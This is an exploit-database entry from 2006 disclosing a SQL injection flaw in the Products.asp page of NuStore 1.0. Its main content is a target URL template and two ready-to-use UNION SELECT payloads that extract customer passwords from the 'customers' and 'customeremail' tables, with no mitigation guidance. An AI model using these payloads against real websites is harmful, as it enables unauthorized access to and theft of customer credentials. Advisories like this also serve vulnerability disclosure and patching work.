id: 1143
date: 11/11/2006
title: NuStore 1.0 (Products.asp) Remote SQL Injection Vulnerability
author: ajann
cves: 

=============================================================
NuStore 1.0 (Products.asp) Remote SQL Injection Vulnerability
=============================================================



*******************************************************************************
# Title  :  NuStore 1.0 (Products.asp) Remote SQL Injection Vulnerability
# Author :   ajann

*******************************************************************************

###http://[target]/[path]/Products.asp?CategoryID=-1&SubCatagoryID=[  SQL ]

Example:

//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customers%20where%20no=0
//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customeremail%20where%20no=0

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!



#  0day.today [2023-03-22]  #